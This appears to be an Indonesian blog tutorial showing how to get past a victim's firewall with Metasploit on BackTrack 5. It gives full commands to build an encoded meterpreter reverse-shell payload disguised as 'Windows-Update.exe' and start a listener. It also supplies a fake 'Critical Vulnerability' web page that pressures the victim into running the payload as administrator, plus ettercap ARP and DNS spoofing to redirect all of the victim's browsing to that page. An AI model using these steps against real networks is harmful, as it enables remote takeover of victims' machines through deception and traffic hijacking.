Home » » Metasploit Bypass Firewall V.2

Metasploit Bypass Firewall V.2

Dalam tutorial ini menggunakan Back|Track 5 GNOME 32. Dan menggunakan beberapa software berikut:

1. msfpayload
2. msfencode
3. msfconsole
4. apache2
5. ettercap-ng

Briefing:
1. Buat payload menggunakan msfpayload
2. encode payload dengan msfencode
3. jalankan exploit/multi/handler dengan msfconsole
4. edit index.html lalu jalankan apache2
5. lakukan dns_spoofing
6. GAME OVER

Keadaan:
1. Korban menggunakan firewall untuk menutup port.

Screenshoot firewall:

Spoiler: hide
[Image: firewall.png]

Screenshoot kegagalan nmap:
Spoiler: hide
[Image: nmap.png]

Walkthrough:
1. Buat payload menggunakan msfpayload

2. Encode payload dengan msfencode

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=ip address attacker LPORT=listening port attacker -e jenis encoding -i jumlah encoding X > directory output payload

Dalam tutorial kali ini, IP address saya 192.168.1.5, port 4444, dan menggunakan encoder shikata_ga_nai dan meng-encode nya sebanyak 8 kali, lalu menaruhnya di folder /var/www/ dengan nama Windows-Update.exe.

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -e shikata_ga_nai -i 8 X > /var/www/Windows-Update.exe

Screenshoot:
Spoiler: hide
[Image: msfpayload.png]

3. jalankan exploit/multi/handler dengan msfconsole

Code:
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf  exploit(handler) > set LPORT 4444
LPORT => 4444

Lalu masukan perintah exploit.

Code:
msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler...

4. Edit index html, lalu jalankan service apache2

a. Untuk mengedit index.html, buka terminal lalu masukan perintah:
Code:
gedit /var/www/index.html

Hapus semua code, lalu ganti menjadi:
Code:
<html>
<head></head>
<title>Warning!!!!</title>
<body><p align="center" class="style2"><u><b>Critical Vulnerabilty has detected!!!</b></u><br><br>You can't continue your browsing, unless you download Windows-Update and run it as administrator to fix the vulnerability. You can download Windows-Update here.<br><input align="center" type="button" name="Button" value="Download Windows-Update" onCLick="window.open('Windows-Update.exe', 'download'); return false;"></p>
</body>
</html>

b. Jalankan service apache 2, masukan perintah:
Code:
/etc/init.d/apache2 start

5. Lakukan dns_spoofing dengan ettercap. Ini berfungsi agar korban selalu menuju halaman yang sama kemanapun dia pergi.

Sebelum melakukan dns_spoofing, lakukan pengaturan dns ettercap dengan mengedit etter.dns. Buka terminal, lalu masukan perintah berikut:

Code:
gedit /usr/share/ettercap/etter.dns

Tambahkan pengaturan ini di baris paling bawah (BUAT BARIR BARU)
Code:
* A IP-Address Kamu

Karena IP-Address saya 192.168.1.5, maka:

Code:
* A 192.168.1.5

Lalu jalankan dns_spoof dengan memasukan perintah ini di terminal:

Code:
ettercap -i interface -T -q -P jenis plugin -M ARP /gateway/ /korban/

Pada tutorial kali ini, saya menggunakan interface wlan0, menggunakan plugin dns_spoof, gateway = 192.168.1.1, ip address korban = 192.168.1.6.

Code:
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1/ /192.168.1.6/

Apa yang terjadi dengan korban?

Ini sebelum dns_spoof
Spoiler: hide
[Image: tanpadns_spoof.png]

Ini setelah dns spoof, dan koban mencoba menuju http://www.facebook.com
Spoiler: hide
[Image: dns_spooffacebook.png]

Lalu korban mencoba menuju http://www.twitter.com
Spoiler: hide
[Image: dns_spooftwitter.png]

Kemudian korban mencoba menuju mail.yahoo.com
Spoiler: hide
[Image: dns_spoofyahoo.png]

Apa inti dari semua ini? Kembali lagi pada perintah * A 192.168.1.5 dns_spoof mencoba membelokan arah koneksi menuju * (semua alamat web) menuju 192.168.1.5 (ip address saya)

Lalu mengapa korban melihat halaman tersebut ketika menuju IP address saya? Ini karena service apache2. Apache2 memungkinkan kita membuat web hosting sendiri, dengan IP address local area network. =)
Dan index.html adalah halaman awal.

Kesal dengan semua ini, korban mencoba mendownload file tersebut.
Screenshoot:
Spoiler: hide
[Image: payload.png]

Lalu menjalankannya:
Spoiler: hide
[Image: runpayload.png]

Apa yang terjadi? Tidak ada. Hanya buffer overflow. Mari cek msfconsole:
Spoiler: hide
[Image: meterpreter.png] 
 

0 comments: